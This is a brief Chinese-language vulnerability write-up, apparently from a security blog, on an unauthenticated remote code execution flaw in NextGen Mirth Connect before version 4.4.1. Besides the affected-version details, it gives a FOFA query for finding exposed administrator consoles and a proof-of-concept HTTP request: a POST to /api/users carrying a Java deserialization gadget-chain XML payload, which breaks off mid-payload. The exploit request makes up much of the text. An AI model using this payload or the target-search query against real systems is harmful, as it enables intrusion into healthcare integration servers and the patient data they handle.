0x01 產品簡介

NextGen Mirth Connect是是美國NextGen公司的一個醫療集成引擎，主要用于醫療領域的系統集成和數據交換，支持多種協議和標準。

0x02 漏洞概述

NextGen Mirth Connect 4.4.1之前版本存在遠程代碼執行漏洞，未經身份認證的攻擊者可利用該漏洞遠程執行代碼。

0x03 影響范圍

NextGen NextGen Mirth Connect < 4.4.1

0x04 復現環境

FOFA：title="Mirth Connect Administrator"

0x05 漏洞復現

PoC

POST /api/users HTTP/1.1
Host: your-ip
X-Requested-With: OpenAPI
Content-Type: application/xml<sorted-set><string>abcd</string><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler"><target class="org.apache.commons.collections4.functors.Chai